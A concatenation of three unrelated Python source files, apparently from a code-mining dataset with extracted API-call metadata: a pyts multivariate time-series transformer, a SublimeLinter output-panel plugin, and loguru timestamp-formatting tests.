class MultivariateTransformer(BaseEstimator, TransformerMixin):
r"""Transformer for multivariate time series.
It provides a convenient class to transform multivariate time series with
transformers that can only deal with univariate time series.
Parameters
----------
estimator : estimator object or list thereof
Transformer. If one estimator is provided, it is cloned and each clone
transforms one feature. If a list of estimators is provided, each
estimator transforms one feature.
flatten : bool (default = True)
Affect shape of transform output. If True, ``transform``
returns an array with shape (n_samples, \*). If False, the output of
``transform`` from each estimator must have the same shape and
``transform`` returns an array with shape (n_samples, n_features, \*).
Ignored if the transformers return sparse matrices.
Attributes
----------
estimators_ : list of estimator objects
The collection of fitted transformers.
Examples
--------
>>> from pyts.datasets import load_basic_motions
>>> from pyts.multivariate.transformation import MultivariateTransformer
>>> from pyts.image import GramianAngularField
>>> X, _, _, _ = load_basic_motions(return_X_y=True)
>>> transformer = MultivariateTransformer(GramianAngularField(),
... flatten=False)
>>> X_new = transformer.fit_transform(X)
>>> X_new.shape
(40, 6, 100, 100)
"""
def __init__(self, estimator, flatten=True):
self.estimator = estimator
self.flatten = flatten
def fit(self, X, y=None):
"""Pass.
Parameters
----------
X : array-like, shape = (n_samples, n_features, n_timestamps)
Multivariate time series.
y : None or array-like, shape = (n_samples,) (default = None)
Class labels.
Returns
-------
self : object
"""
X = check_3d_array(X)
_, n_features, _ = X.shape
self._check_params(n_features)
for i, transformer in enumerate(self.estimators_):
transformer.fit(X[:, i, :], y)
return self
def transform(self, X):
r"""Apply transform to each feature.
Parameters
----------
X : array-like, shape = (n_samples, n_features, n_timestamps)
Multivariate time series.
Returns
-------
X_new : array, shape = (n_samples, *) or (n_samples, n_features, *)
Transformed time series.
"""
X = check_3d_array(X)
n_samples, _, _ = X.shape
check_is_fitted(self, 'estimators_')
X_transformed = [transformer.transform(X[:, i, :])
for i, transformer in enumerate(self.estimators_)]
all_sparse = np.all([isinstance(X_transformed_i, csr_matrix)
for X_transformed_i in X_transformed])
if all_sparse:
X_new = hstack(X_transformed)
else:
X_new = [self._convert_to_array(X_transformed_i)
for X_transformed_i in X_transformed]
ndims = [X_new_i.ndim for X_new_i in X_new]
shapes = [X_new_i.shape for X_new_i in X_new]
one_dim = (np.unique(ndims).size == 1)
if one_dim:
one_shape = np.unique(shapes, axis=0).shape[0] == 1
else:
one_shape = False
if (not one_shape) or self.flatten:
X_new = [X_new_i.reshape(n_samples, -1) for X_new_i in X_new]
X_new = np.concatenate(X_new, axis=1)
else:
X_new = np.asarray(X_new)
axes = [1, 0] + [i for i in range(2, X_new.ndim)]
X_new = np.transpose(X_new, axes=axes)
return X_new
def _check_params(self, n_features):
"""Check parameters."""
transformer = (isinstance(self.estimator, BaseEstimator)
and hasattr(self.estimator, 'transform'))
if transformer:
self.estimators_ = [clone(self.estimator)
for _ in range(n_features)]
elif isinstance(self.estimator, list):
if len(self.estimator) != n_features:
raise ValueError(
"If 'estimator' is a list, its length must be equal to "
"the number of features ({0} != {1})"
.format(len(self.estimator), n_features)
)
for i, estimator in enumerate(self.estimator):
if not (isinstance(estimator, BaseEstimator)
and hasattr(estimator, 'transform')):
raise ValueError("Estimator {} must be a transformer."
.format(i))
self.estimators_ = self.estimator
else:
raise TypeError(
"'estimator' must be a transformer that inherits from "
"sklearn.base.BaseEstimator or a list thereof.")
@staticmethod
def _convert_to_array(X):
"""Convert the input data to an array if necessary."""
if isinstance(X, csr_matrix):
return X.A
elif isinstance(X, np.ndarray):
return X
else:
raise ValueError('Unexpected type for X: {}.'
.format(type(X).__name__))
| [
"sklearn.utils.validation.check_is_fitted",
"numpy.unique",
"sklearn.base.clone",
"numpy.asarray",
"scipy.sparse.hstack",
"numpy.concatenate",
"numpy.transpose"
] | [((3024, 3060), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self', '"""estimators_"""'], {}), "(self, 'estimators_')\n", (3039, 3060), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((3377, 3398), 'scipy.sparse.hstack', 'hstack', (['X_transformed'], {}), '(X_transformed)\n', (3383, 3398), False, 'from scipy.sparse import csr_matrix, hstack\n'), ((3992, 4021), 'numpy.concatenate', 'np.concatenate', (['X_new'], {'axis': '(1)'}), '(X_new, axis=1)\n', (4006, 4021), True, 'import numpy as np\n'), ((4064, 4081), 'numpy.asarray', 'np.asarray', (['X_new'], {}), '(X_new)\n', (4074, 4081), True, 'import numpy as np\n'), ((4172, 4202), 'numpy.transpose', 'np.transpose', (['X_new'], {'axes': 'axes'}), '(X_new, axes=axes)\n', (4184, 4202), True, 'import numpy as np\n'), ((4484, 4505), 'sklearn.base.clone', 'clone', (['self.estimator'], {}), '(self.estimator)\n', (4489, 4505), False, 'from sklearn.base import BaseEstimator, TransformerMixin, clone\n'), ((3670, 3686), 'numpy.unique', 'np.unique', (['ndims'], {}), '(ndims)\n', (3679, 3686), True, 'import numpy as np\n'), ((3750, 3775), 'numpy.unique', 'np.unique', (['shapes'], {'axis': '(0)'}), '(shapes, axis=0)\n', (3759, 3775), True, 'import numpy as np\n')] |
from functools import partial
from itertools import chain
import os
import sublime
import sublime_plugin
import textwrap
from .lint import elect, events, persist, util
if False:
from typing import (
Any, Dict, Iterable, List, Optional, Set, Tuple,
Union
)
from mypy_extensions import TypedDict
from .lint.persist import LintError
State_ = TypedDict('State_', {
'active_view': Optional[sublime.View],
'cursor': int,
'panel_opened_automatically': Set[sublime.WindowId]
})
bid = sublime.BufferId
ErrorsByBid = Dict[bid, List[LintError]]
PANEL_NAME = "SublimeLinter"
OUTPUT_PANEL = "output." + PANEL_NAME
State = {
'active_view': None,
'cursor': -1,
'panel_opened_automatically': set()
} # type: State_
def plugin_loaded():
active_window = sublime.active_window()
State.update({
'active_view': active_window.active_view()
})
ensure_panel(active_window)
def plugin_unloaded():
events.off(on_lint_result)
events.off(on_updated_error_positions)
for window in sublime.windows():
window.destroy_output_panel(PANEL_NAME)
@events.on(events.LINT_RESULT)
def on_lint_result(buffer_id, reason=None, **kwargs):
maybe_toggle_panel_automatically = reason in ('on_save', 'on_user_request')
for window in sublime.windows():
if buffer_id in buffer_ids_per_window(window):
if panel_is_active(window):
fill_panel(window)
if maybe_toggle_panel_automatically:
toggle_panel_if_errors(window, buffer_id)
@events.on('updated_error_positions')
def on_updated_error_positions(view, **kwargs):
bid = view.buffer_id()
window = view.window()
if panel_is_active(window) and bid in buffer_ids_per_window(window):
fill_panel(window)
class UpdateState(sublime_plugin.EventListener):
def on_activated_async(self, active_view):
window = active_view.window()
# Sometimes a view is activated and then destructed before we get here
# and then it doesn't have a window anymore
if not window or active_view.settings().get('is_widget'):
return
State.update({
'active_view': active_view,
'cursor': get_current_pos(active_view)
})
ensure_panel(window)
if panel_is_active(window):
update_panel_selection(**State)
start_viewport_poller()
else:
stop_viewport_poller()
def on_selection_modified_async(self, view):
active_view = State['active_view']
# Do not race between `plugin_loaded` and this event handler
if active_view is None:
return
if view.buffer_id() != active_view.buffer_id():
return
cursor = get_current_pos(active_view)
if cursor != State['cursor']:
State.update({
'cursor': cursor
})
if panel_is_active(active_view.window()):
update_panel_selection(**State)
def on_pre_close(self, view):
window = view.window()
# If the user closes the window and not *just* a view, the view is
# already detached, hence we check.
if window and panel_is_active(window):
sublime.set_timeout_async(lambda: fill_panel(window))
@util.distinct_until_buffer_changed
def on_post_save_async(self, view):
# type: (sublime.View) -> None
# In background mode most of the time the errors are already up-to-date
# on save, so we (maybe) show the panel immediately.
if view_gets_linted_on_modified_event(view):
toggle_panel_if_errors(view.window(), view.buffer_id())
def on_post_window_command(self, window, command_name, args):
if command_name == 'hide_panel':
State['panel_opened_automatically'].discard(window.id())
stop_viewport_poller()
return
if command_name == 'show_panel':
if args.get('panel') == OUTPUT_PANEL:
fill_panel(window)
# Apply focus fix to ensure `next_result` is bound to our panel.
active_group = window.active_group()
active_view = window.active_view()
panel = get_panel(window)
window.focus_view(panel)
window.focus_group(active_group)
window.focus_view(active_view)
sublime.set_timeout(start_viewport_poller)
else:
stop_viewport_poller()
def view_gets_linted_on_modified_event(view):
# type: (sublime.View) -> bool
return any(elect.runnable_linters_for_view(view, 'on_modified'))
def toggle_panel_if_errors(window, bid):
"""Toggle the panel if the view or window has problems, depending on settings."""
if window is None:
return
show_panel_on_save = persist.settings.get('show_panel_on_save')
if show_panel_on_save == 'never':
return
errors_by_bid = get_window_errors(window, persist.errors)
has_relevant_errors = (
show_panel_on_save == 'window' and errors_by_bid or
bid in errors_by_bid)
if not panel_is_active(window) and has_relevant_errors:
window.run_command("show_panel", {"panel": OUTPUT_PANEL})
State['panel_opened_automatically'].add(window.id())
elif (
panel_is_active(window) and
not has_relevant_errors and
window.id() in State['panel_opened_automatically']
):
window.run_command("hide_panel", {"panel": OUTPUT_PANEL})
class SublimeLinterPanelToggleCommand(sublime_plugin.WindowCommand):
def run(self):
if panel_is_active(self.window):
self.window.run_command("hide_panel", {"panel": OUTPUT_PANEL})
else:
self.window.run_command("show_panel", {"panel": OUTPUT_PANEL})
def get_current_pos(view):
return next((s.begin() for s in view.sel()), -1)
def panel_is_active(window):
if not window:
return False
if window.active_panel() == OUTPUT_PANEL:
return True
else:
return False
def ensure_panel(window):
# type: (sublime.Window) -> Optional[sublime.View]
return get_panel(window) or create_panel(window)
def get_panel(window):
# type: (sublime.Window) -> Optional[sublime.View]
return window.find_output_panel(PANEL_NAME)
def create_panel(window):
panel = window.create_output_panel(PANEL_NAME)
panel.settings().set("result_file_regex", r"^(.*):$")
# row:col type linter: code message
# where code is optional
# r"^ +(\d+)(?::(\d+))? +\w+ +\w+:(?: \w+)? +(.*)$"
panel.settings().set("result_line_regex", r"^ +(\d+)(?::(\d+))?.*")
syntax_path = "Packages/SublimeLinter/panel/panel.sublime-syntax"
try: # Try the resource first, in case we're in the middle of an upgrade
sublime.load_resource(syntax_path)
except Exception:
return
panel.assign_syntax(syntax_path)
# Call create_output_panel a second time after assigning the above
# settings, so that it'll be picked up as a result buffer
# see: Packages/Default/exec.py#L228-L230
return window.create_output_panel(PANEL_NAME)
def draw(panel, content=None, errors_from_active_view=[], nearby_lines=None):
# type: (sublime.View, str, List[LintError], Union[int, List[int]]) -> None
if content is not None:
update_panel_content(panel, content)
if nearby_lines is None:
mark_lines(panel, None)
draw_position_marker(panel, None)
scroll_into_view(panel, None, errors_from_active_view)
elif isinstance(nearby_lines, list):
mark_lines(panel, nearby_lines)
draw_position_marker(panel, None)
scroll_into_view(panel, nearby_lines, errors_from_active_view)
else:
mark_lines(panel, None)
draw_position_marker(panel, nearby_lines)
scroll_into_view(panel, [nearby_lines], errors_from_active_view)
def draw_on_main_thread(*args, **kwargs):
sublime.set_timeout(lambda: draw(*args, **kwargs))
def get_window_errors(window, errors_by_bid):
# type: (sublime.Window, ErrorsByBid) -> ErrorsByBid
return {
bid: sorted(
errors,
key=lambda e: (e["line"], e["start"], e["end"], e["linter"])
)
for bid, errors in (
(bid, errors_by_bid.get(bid))
for bid in buffer_ids_per_window(window)
)
if errors
}
def buffer_ids_per_window(window):
return {v.buffer_id() for v in window.views()}
def create_path_dict(window, bids):
file_names_by_bid = get_filenames(window, bids)
base_dir = get_common_parent([
path
for path in file_names_by_bid.values()
if not path.startswith('<untitled')
])
rel_paths = {
bid: (
os.path.relpath(abs_path, base_dir)
if base_dir and not abs_path.startswith('<untitled')
else abs_path
)
for bid, abs_path in file_names_by_bid.items()
}
return rel_paths, base_dir
def get_filenames(window, bids):
"""
Return dict of buffer_id: file_name for all views in window.
Assign a substitute name to untitled buffers: <untitled buffer_id>
"""
return {
v.buffer_id(): v.file_name() or "<untitled {}>".format(v.buffer_id())
for v in window.views()
if v.buffer_id() in bids
}
def get_common_parent(paths):
"""Get the common parent directory of multiple absolute file paths."""
common_path = os.path.commonprefix(paths)
return os.path.dirname(common_path)
def format_header(f_path):
return "{}:".format(f_path)
def format_error(error, widths):
# type: (LintError, Dict[str, int]) -> List[str]
code_width = widths['code']
code_tmpl = ":{{code:<{}}}".format(code_width)
tmpl = (
" {{LINE:>{line}}}:{{START:<{col}}} {{error_type:{error_type}}} "
"{{linter:<{linter_name}}}{{CODE}} "
.format(**widths)
)
line = error["line"] + 1
start = error["start"] + 1
code = (
code_tmpl.format(**error)
if error['code']
else ' ' * (code_width + (1 if code_width else 0)) # + 1 for the ':'
)
info = tmpl.format(LINE=line, START=start, CODE=code, **error)
rv = textwrap.wrap(
error['msg'],
width=widths['viewport'],
initial_indent=" " * len(info),
subsequent_indent=" " * len(info)
)
rv[0] = info + rv[0].lstrip()
return rv
def fill_panel(window, then=draw_on_main_thread):
"""Create the panel if it doesn't exist, then update its contents."""
panel = ensure_panel(window)
# If we're here and the user actually closed the window in the meantime,
# we cannot create a panel anymore, and just pass.
if not panel:
return
errors_by_bid = get_window_errors(window, persist.errors)
fpath_by_bid, base_dir = create_path_dict(window, errors_by_bid.keys())
settings = panel.settings()
settings.set("result_base_dir", base_dir)
widths = dict(
zip(
('line', 'col', 'error_type', 'linter_name', 'code'),
map(
max,
zip(*[
(
len(str(error['line'] + 1)),
len(str(error['start'] + 1)),
len(error['error_type']),
len(error['linter']),
len(str(error['code'])),
)
for error in chain(*errors_by_bid.values())
])
)
)
) # type: Dict[str, int]
widths['viewport'] = int(panel.viewport_extent()[0] // panel.em_width() - 1)
to_render = []
for fpath, errors in sorted(
(fpath_by_bid[bid], errors) for bid, errors in errors_by_bid.items()
):
to_render.append(format_header(fpath))
for error in errors:
lines = format_error(error, widths)
to_render.extend(lines)
error["panel_line"] = (len(to_render) - len(lines), len(to_render) - 1)
# Insert empty line between files
to_render.append("")
content = '\n'.join(to_render)
draw_info = {
'panel': panel,
'content': content
}
if State['active_view'].window() == window:
update_panel_selection(draw_info=draw_info, then=then, **State)
else:
then(**draw_info)
def update_panel_selection(active_view, cursor, draw_info=None, then=draw, **kwargs):
"""Alter panel highlighting according to the current cursor position."""
if draw_info is None:
draw_info = {}
panel = get_panel(active_view.window())
if not panel:
return
if cursor == -1:
return
bid = active_view.buffer_id()
try:
# Rarely, and if so only on hot-reload, `update_panel_selection` runs
# before `fill_panel`, thus 'panel_line' has not been set.
all_errors = sorted(persist.errors[bid], key=lambda e: e['panel_line'])
except KeyError:
all_errors = []
draw_info.update(
panel=panel,
errors_from_active_view=all_errors
) # type: Dict[str, Any]
row, _ = active_view.rowcol(cursor)
errors_with_position = (
(
error,
(
abs(error['line'] - row),
min(
abs(error['region'].begin() - cursor),
abs(error['region'].end() - cursor)
)
)
)
for error in all_errors
) # type: Iterable[Tuple[LintError, Tuple[int, int]]]
SNAP = (3, ) # [lines]
nearest_error = None
try:
nearest_error, _ = min(
(
e_p
for e_p in errors_with_position
if e_p[1] < SNAP
),
key=lambda e_p: e_p[1]
)
except ValueError:
nearest_error = None
if nearest_error:
panel_lines = [
error['panel_line'][0]
for error in all_errors
if nearest_error['region'].contains(error['region'])
]
draw_info.update(nearby_lines=panel_lines)
elif all_errors:
try:
next_error = next(
error
for error in all_errors
if error['region'].begin() > cursor
)
except StopIteration:
last_error = all_errors[-1]
panel_line = last_error['panel_line'][1] + 1
else:
panel_line = next_error['panel_line'][0]
draw_info.update(nearby_lines=panel_line)
then(**draw_info)
# Visual side-effects #
def update_panel_content(panel, text):
if not text:
text = "No lint results."
panel.run_command('_sublime_linter_update_panel_content', {'text': text})
class _sublime_linter_update_panel_content(sublime_plugin.TextCommand):
def run(self, edit, text):
"""Replace a view's text entirely and try to hold the viewport stable."""
view = self.view
x, _ = view.viewport_position()
view.set_read_only(False)
view.replace(edit, sublime.Region(0, view.size()), text)
view.set_read_only(True)
# We cannot measure the `viewport_position` until right after this
# command actually finished. So we defer to the next tick/micro-task
# using `set_timeout`.
sublime.set_timeout(
lambda: view.run_command('_sublime_linter_pin_x_axis', {'x': x})
)
class _sublime_linter_pin_x_axis(sublime_plugin.TextCommand):
def run(self, edit, x):
x2, y2 = self.view.viewport_position()
if x != x2:
self.view.set_viewport_position((x, y2), False)
INNER_MARGIN = 2 # [lines]
JUMP_COEFFICIENT = 3
def scroll_into_view(panel, wanted_lines, errors):
# type: (sublime.View, Optional[List[int]], List[LintError]) -> None
"""Compute and then scroll the view so that `wanted_lines` appear.
Basically an optimized, do-it-yourself version of `view.show()`. If
possible shows the start of this file section (the filename) at the top
of the viewport. Otherwise tries to not 'overscroll' so that errors from a
possible next file are essentially hidden. Inbetween tries to scroll as
little as possible.
"""
if not errors or not wanted_lines:
return
# We would like to use just `view.visible_region()` but that doesn't count
# lines past the content. E.g. if you're at the eof it - for our purpose
# wrongly - tells you that the visible region is only 2 lines height.
# So we compute the values basically using `viewport_extent()`. This
# unfortunately leads to rounding errors bc we must convert from pixels
# to lines. See below.
_, vy = panel.viewport_position()
vtop = panel.rowcol(panel.layout_to_text((0.0, vy)))[0]
vheight = int(panel.viewport_extent()[1] // panel.line_height())
vbottom = vtop + vheight
# Before the first error comes the filename
ftop = errors[0]['panel_line'][0] - 1
# After the last error comes the empty line
fbottom = errors[-1]['panel_line'][1] + 1
fheight = fbottom - ftop + 1
if fheight <= vheight:
scroll_to_line(panel, ftop, animate=False)
return
wtop, wbottom = wanted_lines[0], wanted_lines[-1]
out_of_bounds = False
jump_position = int(vheight // JUMP_COEFFICIENT)
if fbottom < vbottom:
out_of_bounds = True
vtop = max(ftop, fbottom - vheight)
elif ftop > vtop:
out_of_bounds = True
vtop = ftop
if vtop + INNER_MARGIN < wbottom < vbottom - INNER_MARGIN:
if not out_of_bounds:
return # Do nothing bc `vtop` likely has rounding errors
elif wtop < vtop + INNER_MARGIN:
vtop = max(ftop, wtop - jump_position)
elif vbottom - INNER_MARGIN < wbottom:
next_bottom = min(fbottom, wbottom + jump_position)
vtop = max(ftop, next_bottom - vheight)
scroll_to_line(panel, vtop, animate=not out_of_bounds)
def scroll_to_line(view, line, animate):
"""Scroll y-axis so that `line` appears at the top of the viewport."""
x, y = view.text_to_layout(view.text_point(line, 0))
view.run_command('_sublime_linter_scroll_y', {'y': y, 'animate': animate})
class _sublime_linter_scroll_y(sublime_plugin.TextCommand):
def run(self, edit, y, animate):
x, _ = self.view.viewport_position()
self.view.set_viewport_position((x, y), animate)
def mark_lines(panel, lines):
# type: (sublime.View, Optional[List[int]]) -> None
"""Select/Highlight given lines."""
if lines is None:
panel.sel().clear()
return
regions = [panel.line(panel.text_point(line, 0)) for line in lines]
panel.sel().clear()
panel.sel().add_all(regions)
CURSOR_MARKER_KEY = 'SL.PanelMarker'
CURSOR_MARKER_SCOPE = 'region.yellowish.panel_cursor.sublime_linter'
def draw_position_marker(panel, line):
# type: (sublime.View, Optional[int]) -> None
"""Draw a visual cursor 'below' given line.
We draw a region 'dangle' (a region of length 0 at the start of a line)
*at* the given `line` which usually appears as if it were slightly below
the current line, or between this and the next line.
Basically a visual hack.
"""
if line is None:
panel.erase_regions(CURSOR_MARKER_KEY)
return
line_start = panel.text_point(line - 1, 0)
region = sublime.Region(line_start, line_start)
draw_region_dangle(panel, CURSOR_MARKER_KEY, CURSOR_MARKER_SCOPE, [region])
CONFUSION_THRESHOLD = 5
VIEWPORT_MARKER_KEY = 'SL.Panel.ViewportMarker'
VIEWPORT_MARKER_SCOPE = 'region.bluish.visible_viewport.sublime_linter'
VIEWPORT_BACKGROUND_KEY = 'SL.Panel.ViewportBackground'
_RUNNING = False
def get_viewport_background_scope():
return persist.settings.get('xperiments', {}).get('viewport_background_scope')
def start_viewport_poller():
global _RUNNING
if _RUNNING:
return
_RUNNING = True
update_viewport()
def stop_viewport_poller():
global _RUNNING
_RUNNING = False
def update_viewport(token1=None, token2=None):
global _RUNNING
if not _RUNNING:
return
next_token1 = mayby_rerender_panel(token1)
next_token2 = maybe_render_viewport(token2)
sublime.set_timeout(partial(update_viewport, next_token1, next_token2), 16)
def mayby_rerender_panel(previous_token):
view = State['active_view']
if not view:
return
token = (view.viewport_extent(),)
if token != previous_token:
window = view.window()
if not window:
return
fill_panel(window)
return token
def maybe_render_viewport(previous_token):
view = State['active_view']
if not view:
return
window = view.window()
if not window:
return
panel = get_panel(window)
if not panel:
return
token = (
view.buffer_id(),
view.visible_region(),
panel.change_count(),
panel.get_regions(CURSOR_MARKER_KEY)
)
if token != previous_token:
render_visible_viewport(panel, view)
return token
def render_visible_viewport(panel, view):
# type: (sublime.View, sublime.View) -> None
"""Compute and draw a fancy scrollbar like region on the left...
... indicating the current viewport into that file or error(s) list.
"""
errors = persist.errors.get(view.buffer_id(), [])
if len(errors) > CONFUSION_THRESHOLD:
viewport = view.visible_region()
visible_errors = [
error
for error in errors
if viewport.contains(error['region'])
]
if visible_errors and len(visible_errors) != len(errors):
try:
visible_errors = sorted(
visible_errors, key=lambda error: error['panel_line'])
except KeyError:
return
head, end = visible_errors[0], visible_errors[-1]
head_line = panel.text_point(head['panel_line'][0] - 1, 0)
end_line = panel.text_point(end['panel_line'][1], 0)
regions = [
sublime.Region(head_line, head_line),
sublime.Region(end_line, end_line)
]
cursor = panel.get_regions(CURSOR_MARKER_KEY)
regions = [r for r in regions if r not in cursor]
draw_region_dangle(
panel, VIEWPORT_MARKER_KEY, VIEWPORT_MARKER_SCOPE, regions)
viewport_background_scope = get_viewport_background_scope()
if viewport_background_scope:
head_line = panel.text_point(head['panel_line'][0], 0)
end_line = panel.text_point(end['panel_line'][1] + 1, 0)
regions = [
sublime.Region(r.a, r.a + 1)
for r in panel.lines(sublime.Region(head_line, end_line))
]
flags = sublime.DRAW_NO_OUTLINE
panel.add_regions(
VIEWPORT_BACKGROUND_KEY, regions,
scope=viewport_background_scope, flags=flags)
return
panel.erase_regions(VIEWPORT_MARKER_KEY)
panel.erase_regions(VIEWPORT_BACKGROUND_KEY)
DANGLE_FLAGS = (
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_NO_FILL |
sublime.DRAW_NO_OUTLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
def draw_region_dangle(view, key, scope, regions):
# type: (sublime.View, str, str, List[sublime.Region]) -> None
view.add_regions(key, regions, scope=scope, flags=DANGLE_FLAGS)
| [
"sublime.windows",
"sublime.active_window",
"os.path.dirname",
"sublime.set_timeout",
"functools.partial",
"os.path.commonprefix",
"sublime.load_resource",
"mypy_extensions.TypedDict",
"sublime.Region",
"os.path.relpath"
] | [((379, 511), 'mypy_extensions.TypedDict', 'TypedDict', (['"""State_"""', "{'active_view': Optional[sublime.View], 'cursor': int,\n 'panel_opened_automatically': Set[sublime.WindowId]}"], {}), "('State_', {'active_view': Optional[sublime.View], 'cursor': int,\n 'panel_opened_automatically': Set[sublime.WindowId]})\n", (388, 511), False, 'from mypy_extensions import TypedDict\n'), ((834, 857), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (855, 857), False, 'import sublime\n'), ((1085, 1102), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (1100, 1102), False, 'import sublime\n'), ((1337, 1354), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (1352, 1354), False, 'import sublime\n'), ((9588, 9615), 'os.path.commonprefix', 'os.path.commonprefix', (['paths'], {}), '(paths)\n', (9608, 9615), False, 'import os\n'), ((9627, 9655), 'os.path.dirname', 'os.path.dirname', (['common_path'], {}), '(common_path)\n', (9642, 9655), False, 'import os\n'), ((19545, 19583), 'sublime.Region', 'sublime.Region', (['line_start', 'line_start'], {}), '(line_start, line_start)\n', (19559, 19583), False, 'import sublime\n'), ((6915, 6949), 'sublime.load_resource', 'sublime.load_resource', (['syntax_path'], {}), '(syntax_path)\n', (6936, 6949), False, 'import sublime\n'), ((20428, 20478), 'functools.partial', 'partial', (['update_viewport', 'next_token1', 'next_token2'], {}), '(update_viewport, next_token1, next_token2)\n', (20435, 20478), False, 'from functools import partial\n'), ((8883, 8918), 'os.path.relpath', 'os.path.relpath', (['abs_path', 'base_dir'], {}), '(abs_path, base_dir)\n', (8898, 8918), False, 'import os\n'), ((4481, 4523), 'sublime.set_timeout', 'sublime.set_timeout', (['start_viewport_poller'], {}), '(start_viewport_poller)\n', (4500, 4523), False, 'import sublime\n'), ((22271, 22307), 'sublime.Region', 'sublime.Region', (['head_line', 'head_line'], {}), '(head_line, head_line)\n', (22285, 22307), False, 'import sublime\n'), ((22325, 22359), 'sublime.Region', 'sublime.Region', (['end_line', 'end_line'], {}), '(end_line, end_line)\n', (22339, 22359), False, 'import sublime\n'), ((22909, 22937), 'sublime.Region', 'sublime.Region', (['r.a', '(r.a + 1)'], {}), '(r.a, r.a + 1)\n', (22923, 22937), False, 'import sublime\n'), ((22979, 23014), 'sublime.Region', 'sublime.Region', (['head_line', 'end_line'], {}), '(head_line, end_line)\n', (22993, 23014), False, 'import sublime\n')] |
import datetime
import re
import sys
import freezegun
import pytest
from loguru import logger
if sys.version_info < (3, 6):
UTC_NAME = "UTC+00:00"
else:
UTC_NAME = "UTC"
@pytest.mark.parametrize(
"time_format, date, timezone, expected",
[
(
"%Y-%m-%d %H-%M-%S %f %Z %z",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 UTC +0000",
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 UTC +0000",
),
(
"%Y-%m-%d %H-%M-%S %f %Z %z",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 01-02-03 000045 EST -0500",
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 01-02-03 000045 EST -0500",
),
(
"%Y-%m-%d %H-%M-%S %f %Z!UTC",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 %s" % UTC_NAME,
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 %s" % UTC_NAME,
),
(
"%Y-%m-%d %H-%M-%S %f %Z %z!UTC",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC",
"2018-06-09 01:02:03.000045",
("UTC", -18000),
"2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
),
(
"YY-M-D H-m-s SSS Z",
"2005-04-07 09:03:08.002320",
("A", 3600),
"05-4-7 9-3-8 002 +01:00",
),
(
"Q_DDDD_DDD d_E h_hh A SS ZZ",
"2000-01-01 14:00:00.9",
("B", -1800),
"1_001_1 5_6 2_02 PM 90 -0030",
),
("hh A", "2018-01-01 00:01:02.000003", ("UTC", 0), "12 AM"),
("hh A", "2018-01-01 12:00:00.0", ("UTC", 0), "12 PM"),
("hh A", "2018-01-01 23:00:00.0", ("UTC", 0), "11 PM"),
("[YYYY] MM [DD]", "2018-02-03 11:09:00.000002", ("UTC", 0), "YYYY 02 DD"),
("[YYYY MM DD]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[2018 01 03]"),
("[[YY]]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[YY]"),
("[]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[]"),
("[HHmmss", "2018-01-03 11:03:04.000002", ("UTC", 0), "[110304"),
("HHmmss]", "2018-01-03 11:03:04.000002", ("UTC", 0), "110304]"),
("HH:mm:ss!UTC", "2018-01-01 11:30:00.0", ("A", 7200), "09:30:00"),
("UTC! HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "UTC! 11:30:00"),
("!UTC HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "!UTC 11:30:00"),
(
"hh:mm:ss A - Z ZZ !UTC",
"2018-01-01 12:30:00.0",
("A", 5400),
"11:00:00 AM - +00:00 +0000 ",
),
(
"YYYY-MM-DD HH:mm:ss[Z]!UTC",
"2018-01-03 11:03:04.2",
("XYZ", -7200),
"2018-01-03 13:03:04Z",
),
("HH:mm:ss[!UTC]", "2018-01-01 11:30:00.0", ("A", 7200), "11:30:00!UTC"),
("", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T11:09:00.000002+0030"),
("!UTC", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T10:39:00.000002+0000"),
],
)
def test_formatting(writer, freeze_time, time_format, date, timezone, expected):
with freeze_time(date, timezone):
logger.add(writer, format="{time:%s}" % time_format)
logger.debug("X")
result = writer.read()
assert result == expected + "\n"
def test_locale_formatting(writer, freeze_time):
dt = datetime.datetime(2011, 1, 1, 22, 22, 22, 0)
with freeze_time(dt):
logger.add(writer, format="{time:MMMM MMM dddd ddd}")
logger.debug("Test")
assert writer.read() == dt.strftime("%B %b %A %a\n")
def test_stdout_formatting(freeze_time, capsys):
with freeze_time("2015-12-25 19:13:18", ("A", 5400)):
logger.add(sys.stdout, format="{time:YYYY [MM] DD HHmmss Z} {message}")
logger.debug("Y")
out, err = capsys.readouterr()
assert out == "2015 MM 25 191318 +01:30 Y\n"
assert err == ""
def test_file_formatting(freeze_time, tmp_path):
with freeze_time("2015-12-25 19:13:18", ("A", -5400)):
logger.add(tmp_path / "{time:YYYY [MM] DD HHmmss ZZ}.log")
logger.debug("Z")
assert list(tmp_path.iterdir()) == [tmp_path / "2015 MM 25 191318 -0130.log"]
def test_missing_struct_time_fields(writer, freeze_time):
with freeze_time("2011-01-02 03:04:05.6", include_tm_zone=False):
logger.add(writer, format="{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}")
logger.debug("X")
result = writer.read()
assert re.fullmatch(r"2011 01 02 03 04 05 600000 [+-]\d{4} .*\n", result)
def test_freezegun_mocking(writer):
logger.add(writer, format="[{time:YYYY MM DD HH:mm:ss}] {message}")
with freezegun.freeze_time("2000-01-01 18:00:05"):
logger.info("Frozen")
